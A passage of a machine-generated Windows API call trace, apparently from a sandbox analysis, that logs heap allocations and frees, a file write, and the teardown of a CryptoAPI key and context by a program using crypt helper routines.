hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf690) returned 0xe7e410 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f6e0 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0267.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0267.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34d48 | out: hHeap=0x970000) returned 1 [0267.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe6ed78 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f256b0 | out: hHeap=0x970000) returned 1 [0267.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf690) returned 0xe8daa8 [0267.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe7e410 | out: hHeap=0x970000) returned 1 [0267.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0267.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0267.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf690) returned 0x2f16018 [0267.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.079] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0xf690, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0xf690, lpOverlapped=0x0) returned 1 [0267.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0267.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0267.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0267.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.082] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0267.082] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.083] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0267.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51958, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0267.084] CryptDestroyKey (hKey=0xa872d0) returned 1 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.084] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.085] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.085] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.085] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.085] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0267.085] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0267.085] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.085] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0267.085] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.086] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.086] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.086] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.086] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.086] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.086] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.086] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.086] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.087] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0267.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.087] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.087] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.087] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.087] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0267.087] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0267.088] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.088] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.088] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.088] FreeLibrary (hLibModule=0x756e0000) returned 1 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.088] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0267.088] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.088] HeapFree (in: 